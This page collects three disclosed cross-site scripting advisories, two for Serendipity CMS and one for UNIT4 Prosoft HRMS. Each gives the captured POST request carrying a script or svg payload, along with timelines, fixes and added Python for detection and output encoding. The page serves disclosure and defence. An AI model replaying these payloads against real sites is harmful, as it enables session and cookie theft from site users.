[CVE-2016-9681] Serendipity CMS – XSS Vulnerability in Version 2.0.4

Product Information:

Software: Serendipity CMS

Tested Version: 2.0.4, released 26.09.2016

Vulnerability Type: Cross-Site Scripting (CWE-79)

Download link: https://github.com/s9y/Serendipity/releases/tag/2.0.4

Description: Serendipity is a PHP-powered weblog engine that gives the user an easy way to maintain a blog. While the default package is designed for the casual blogger, Serendipity offers an expandable framework with the power for professional applications. (copied from https://docs.s9y.org/)


Vulnerability description:

There are two XSS vulnerabilities in Serendipity CMS.

1) XSS in the creation of a new category page

2) XSS in the creation of the base directory page

Category Page


When an authenticated user of Serendipity CMS is creating a new category, the following POST request is sent to the server:

POST /s9y/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/s9y/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new
Cookie: serendipity[old_session]=u4l95320lc39fen9n2f8o04jm5; serendipity[userDefLang]=en; serendipity[addmedia_directory]=undefined; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.name; serendipity[sortorder_ordermode]=DESC; serendipity[only_path]=; serendipity[only_filename]=; serendipity[toggle_extended]=true; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; accessibletab_mediaupload_tabs_active=1; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=400; serendipity[imgWidth]=480; serendipity[imgHeight]=480; serendipity[imgID]=5; serendipity[baseURL]=http://127.0.0.1/s9y/; serendipity[indexFile]=index.php; serendipity[imgName]=/s9y/uploads/img_src1_onerroralert1223e.png; serendipity[thumbName]=/s9y/uploads/img_src1_onerroralert1223e.serendipityThumb.png; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; serendipity[author_token]=9e3d614472aa8c3659f653b47fd193a31777f150; s9y_9afefbce28571f388f27f61da1993391=u4l95320lc39fen9n2f8o04jm5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 380

serendipity[token]=355e14e9bde891a03aef7cc5b19d8fab&serendipity[cat][name]=<script>alert(0)</script>&serendipity[cat][description]=&serendipity[cat][parent_cat]=0&serendipity[cat][hide_sub]=0&serendipity[cat][read_authors][]=0&serendipity[cat][write_authors][]=0&serendipity[cat][icon]=&SAVE=Create

The parameter serendipity[cat][name] is vulnerable to XSS.

The payload is executed when an authenticated user creates another category.

Base Directory Page


When an authenticated user of Serendipity CMS is creating a new base directory, the following POST request is sent to the server:

POST /s9y/serendipity_admin.php?serendipity[step]=directoryDoCreate&serendipity[adminModule]=images&serendipity[adminAction]=directoryDoCreate HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/s9y/serendipity_admin.php?serendipity[adminModule]=images&serendipity[adminAction]=directoryCreate
Cookie: serendipity[old_session]=u4l95320lc39fen9n2f8o04jm5; serendipity[userDefLang]=en; serendipity[addmedia_directory]=undefined; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.name; serendipity[sortorder_ordermode]=DESC; serendipity[only_path]=; serendipity[only_filename]=; serendipity[toggle_extended]=true; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; accessibletab_mediaupload_tabs_active=1; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=400; serendipity[imgWidth]=480; serendipity[imgHeight]=480; serendipity[imgID]=5; serendipity[baseURL]=http://127.0.0.1/s9y/; serendipity[indexFile]=index.php; serendipity[imgName]=/s9y/uploads/img_src1_onerroralert1223e.png; serendipity[thumbName]=/s9y/uploads/img_src1_onerroralert1223e.serendipityThumb.png; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; serendipity[author_token]=31fd07e44a90a6bd7a8a03010660df86790eb948; s9y_9afefbce28571f388f27f61da1993391=u4l95320lc39fen9n2f8o04jm5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 171

serendipity[token]=355e14e9bde891a03aef7cc5b19d8fab&serendipity[name]=</script><svg onload=alert(0)>&serendipity[parent]=&SAVE=Create directory

The parameter serendipity[name] is vulnerable to reflected XSS.

The payload is executed once, immediately after the new directory is created.
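The two request bodies above use PHP's bracket convention for nested parameters (serendipity[cat][name], serendipity[cat][read_authors][]), and the same body may arrive percent-encoded, as in the 2015 advisory further down this page. The following Python is an added example for this page, not Serendipity code: a review check a defender can run over captured POST bodies that decodes them the way PHP builds $_POST and reports which parameters carry HTML markup. The bodies are copied from the captured requests on this page; MARKUP_RE is a constructed heuristic, not a rule from the project.

```python
"""Parse PHP-style form bodies and flag parameters whose values contain markup.

Added example for this advisory page (not Serendipity code). The request
bodies are copied from the captured requests on the page; MARKUP_RE is a
constructed detection heuristic."""
import re
from urllib.parse import unquote_plus

# Body of the category-creation request (CVE-2016-9681), as captured above.
CATEGORY_BODY = (
    "serendipity[token]=355e14e9bde891a03aef7cc5b19d8fab"
    "&serendipity[cat][name]=<script>alert(0)</script>"
    "&serendipity[cat][description]=&serendipity[cat][parent_cat]=0"
    "&serendipity[cat][hide_sub]=0&serendipity[cat][read_authors][]=0"
    "&serendipity[cat][write_authors][]=0&serendipity[cat][icon]=&SAVE=Create"
)
# Body of the directory-creation request, as captured above.
DIRECTORY_BODY = (
    "serendipity[token]=355e14e9bde891a03aef7cc5b19d8fab"
    "&serendipity[name]=</script><svg onload=alert(0)>"
    "&serendipity[parent]=&SAVE=Create directory"
)
# Percent-encoded body from the CVE-2015-2289 advisory further down this page.
ENCODED_CATEGORY_BODY = (
    "serendipity%5Btoken%5D=b95339bd8490707038719715c6d58e63"
    "&serendipity%5Bcat%5D%5Bname%5D=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E"
    "&serendipity%5Bcat%5D%5Bdescription%5D=&serendipity%5Bcat%5D%5Bparent_cat%5D=0"
    "&serendipity%5Bcat%5D%5Bhide_sub%5D=0&serendipity%5Bcat%5D%5Bread_authors%5D%5B%5D=0"
    "&serendipity%5Bcat%5D%5Bwrite_authors%5D%5B%5D=0&serendipity%5Bcat%5D%5Bicon%5D=&SAVE=Create"
)

# name followed by zero or more [segment] groups, e.g. serendipity[cat][name]
KEY_RE = re.compile(r"^([^\[\]]+)((?:\[[^\[\]]*\])*)$")
# Constructed heuristic: a tag opener, an on*= event handler, or a javascript: URL.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]|\bon[a-z]+\s*=|javascript:", re.I)


def parse_php_body(body):
    """Decode an application/x-www-form-urlencoded body into nested dicts the
    way PHP builds $_POST: a[b][c]=v -> {'a': {'b': {'c': 'v'}}}; a trailing
    [] appends to a list. Keys and values are percent-decoded first."""
    result = {}
    for pair in body.split("&"):
        if not pair:
            continue
        raw_key, _, raw_value = pair.partition("=")
        key, value = unquote_plus(raw_key), unquote_plus(raw_value)
        match = KEY_RE.match(key)
        if not match:
            result[key] = value  # malformed brackets: keep the literal key
            continue
        parts = [match.group(1)] + re.findall(r"\[([^\[\]]*)\]", match.group(2))
        append = parts[-1] == ""
        if append:
            parts = parts[:-1]
        node = result
        for part in parts[:-1]:
            node = node.setdefault(part, {})
        if append:
            node.setdefault(parts[-1], []).append(value)
        else:
            node[parts[-1]] = value
    return result


def flatten(node, prefix=""):
    """Yield (php_style_key, value) pairs from the nested structure."""
    if isinstance(node, dict):
        for key, child in node.items():
            yield from flatten(child, f"{prefix}[{key}]" if prefix else key)
    elif isinstance(node, list):
        for child in node:
            yield from flatten(child, prefix + "[]")
    else:
        yield prefix, node


def find_markup_params(body):
    """Return PHP-style names of parameters whose decoded value looks like HTML
    or script. Decoding before matching is what defeats percent-encoded variants."""
    return [key for key, value in flatten(parse_php_body(body)) if MARKUP_RE.search(value)]


if __name__ == "__main__":
    for label, body in (("category", CATEGORY_BODY), ("directory", DIRECTORY_BODY),
                        ("encoded category", ENCODED_CATEGORY_BODY)):
        print(f"{label}: {find_markup_params(body)}")
```

Run stand-alone it names serendipity[cat][name] for both category bodies and serendipity[name] for the directory body, while the token, SAVE and numeric fields pass; the same check can be pointed at any access log that records POST bodies.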


Impact:

An attacker is able to inject malicious scripts into otherwise benign and trusted websites. The malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can also rewrite the contents of an HTML page. The exploitation process is also made easy with BeEF (The Browser Exploitation Framework).


Solution:

Update to the latest version, which is 2.0.5, see https://blog.s9y.org/archives/271-Serendipity-2.0.5-and-2.1-beta3-released.html
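The fix for this class of bug is output encoding that matches the context the value is rendered in. The following Python is an added example for this page, not Serendipity or UNIT4 code and not the content of the linked fix commit. The rendering contexts are an assumption inferred from the payload shapes on this page: the category name is treated as element text, the directory name as a JavaScript string inside a <script> block (its payload begins by closing that tag), and the txtUserID value from the UNIT4 advisory below as a quoted attribute value.

```python
"""Context-aware output encoding for the injection points in these advisories.

Added example, not Serendipity or UNIT4 code. The contexts are inferred from
the payload shapes (an assumption): element text for the category name, a
JavaScript string literal for the directory name, a quoted attribute for
txtUserID."""
import html
import json

# Payloads exactly as they appear (percent-decoded) in the captured requests.
CATEGORY_NAME = "<script>alert(0)</script>"
DIRECTORY_NAME = "</script><svg onload=alert(0)>"
LOGIN_USER_ID = '"><script>alert(1);</script>'


def for_html_text(value):
    """Element text context: <li>VALUE</li>. Encodes & < > " ' as entities."""
    return html.escape(value, quote=True)


def for_html_attribute(value):
    """Quoted attribute context: value="VALUE". The same entity set suffices
    only because the attribute is always emitted with double quotes."""
    return html.escape(value, quote=True)


def for_script_literal(value):
    """JavaScript string literal inside a <script> block: var x = VALUE;.
    Entity encoding does not help here (the HTML parser does not decode
    entities inside script content), so emit a JSON string and additionally
    \\u-escape < > & so that "</script>" can never terminate the block."""
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def render_category_item(name):
    """Category name in the element-text context."""
    return f"<li>{for_html_text(name)}</li>"


def render_login_field(user_id):
    """User ID echoed back into the login form's attribute context."""
    return f'<input type="text" name="txtUserID" value="{for_html_attribute(user_id)}">'


def render_directory_script(name):
    """Directory name handed to page script as a JS string literal."""
    return f"<script>var newDir = {for_script_literal(name)};</script>"


def render_directory_script_unsafe(name):
    """The vulnerable pattern, for comparison: raw interpolation into script."""
    return f"<script>var newDir = '{name}';</script>"


def script_block_terminations(rendered):
    """Count closing script tags; a correctly encoded block has exactly one."""
    return rendered.lower().count("</script")


if __name__ == "__main__":
    print(render_category_item(CATEGORY_NAME))
    print(render_login_field(LOGIN_USER_ID))
    print(render_directory_script(DIRECTORY_NAME))
    print("unsafe block closes script", script_block_terminations(
        render_directory_script_unsafe(DIRECTORY_NAME)), "times")
```

The point of the third encoder is that the directory payload would survive plain HTML escaping if the value were first written into a script block: entity-encoding inside <script> leaves the closing tag intact for the HTML parser, whereas \u-escaping the angle brackets keeps the string inert in both the HTML and the JavaScript parser.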


Timeline:

Vulnerability found: 25.11.2016

Vendor informed: 26.11.2016

Response by vendor: 28.11.2016

Fix by vendor: 28.11.2016

Public Advisory: 03.12.2016


Reference:

https://github.com/s9y/Serendipity/commit/e2a665e13b7de82a71c9bbb77575d15131b722be

[CVE-2015-2289] Serendipity CMS – XSS Vulnerability in Version 2.0


Product Information:

Software: Serendipity CMS

Tested Version: 2.0, released 23.1.2015

Vulnerability Type: Cross-Site Scripting (CWE-79)

Download link: http://www.s9y.org/12.html

Description: Serendipity aims to make everything possible you ever wished for. It is technically on par with other well-known weblog scripts like Movable Type or WordPress. (copied from http://www.s9y.org/3.html)


Vulnerability description:

An XSS vulnerability was found in the category creation page. When an authenticated user of Serendipity CMS is creating a new category, the following POST request is sent to the server:

POST /serendipity-2.0/serendipity/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 394
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/serendipity-2.0/serendipity/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: serendipity[old_session]=q8jagkbn03i41p1hea1vp3mqi7; serendipity[author_token]=906de2dd7201b75f1f710f59128e1ffb5cec6cf4; serendipity[userDefLang]=en; serendipity[toggle_extended]=true; serendipity[addmedia_directory]=undefined; serendipity[sortorder_perpage]=; serendipity[sortorder_order]=; serendipity[sortorder_ordermode]=; serendipity[only_path]=; serendipity[only_filename]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; s9y_f857b4bc988a333c379a2d9bd477dd65=q8jagkbn03i41p1hea1vp3mqi7

serendipity%5Btoken%5D=b95339bd8490707038719715c6d58e63&serendipity%5Bcat%5D%5Bname%5D=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&serendipity%5Bcat%5D%5Bdescription%5D=&serendipity%5Bcat%5D%5Bparent_cat%5D=0&serendipity%5Bcat%5D%5Bhide_sub%5D=0&serendipity%5Bcat%5D%5Bread_authors%5D%5B%5D=0&serendipity%5Bcat%5D%5Bwrite_authors%5D%5B%5D=0&serendipity%5Bcat%5D%5Bicon%5D=&SAVE=Create

The parameter serendipity[cat][name] is vulnerable to XSS. The payload is executed when an authenticated user navigates to the “New Entry” page.


Impact:

An attacker can leverage the XSS vulnerability against content creators of Serendipity CMS, for example by injecting malicious JavaScript code in order to use attack tools like BeEF.


Solution: Update to the latest version, which is 2.0.1, see http://blog.s9y.org/archives/263-Serendipity-2.0.1-released.html


Timeline:

Vulnerability found: 12.3.2015

Vendor informed: 12.3.2015

Response by vendor: 12.3.2015

Fix by vendor: 12.3.2015

Public Advisory: 13.3.2015


Reference: https://github.com/s9y/Serendipity/commit/a30886d3bb9d8eeb6698948864c77caaa982435d


This advisory is also available on SecurityFocus.

[CVE-2015-2082] UNIT4 Prosoft HRMS XSS Vulnerability

# Vulnerability type: Cross-site Scripting

# Vendor: http://www.unit4.com/

# Product: UNIT4 Prosoft HRMS

# Product site: http://www.unit4apac.com/products/prosofthrms

# Affected version: 8.14.230.47

# Fixed version: 8.14.330.43

# Credit: Jerold Hoong & Edric Teo

# PROOF OF CONCEPT

The login page of UNIT4’s Prosoft HRMS is vulnerable to cross-site scripting.

POST /Login.aspx?ReturnUrl=%2fCommon%2fBroadcastMessageDisplay.aspx%3fUrlReferrerCode%3d&UrlReferrerCode HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=teuq5d45e53ecg45mzptyv55
Host: 127.0.0.1
Content-Length: 1276
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-SG
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMjAyNzEwNDEyO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%2FZGQCFw8PFgYfAAUHU2lnbiBJbh4EXyF
TQgKAAh4FV2lkdGgbAAAAAADAUkABAAAAZGQCCw9kFgJmD2QWBAIDDxYCHwAFQkNvcH
lyaWdodCDCqSAyMDExIFVOSVQ0IEFzaWEgUGFjaWZpYyBQdGUgTHRkLiBBbGwgUmlna
HRzIFJlc2VydmVkLmQCBQ8WAh8ABRNWZXJzaW9uIDguMTQuMzMwLjQzZGSwnj3yxmGD
Z9jR0wKr5HZldmVj4w%3D%3D&__EVENTVALIDATION=%2FwEWBQLctJOuBALT8dy8BQ
K1qbSRCwLWxaLXDALD94uUBwZOBjPAY1F7DZ4L5a8tZ4BpX9CW&txtUserID=%22%3E
%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&txtPassword=&btnSignIn=S
ign+In

# TIMELINE

28/10/2014: Vulnerability found

04/11/2014: Vendor informed

04/11/2014: Vendor responded

30/11/2014: Vendor fixed the issue

14/02/2015: Public disclosure


This advisory is also available on SecurityFocus, CVE Mitre and Jerold Hoong’s blog.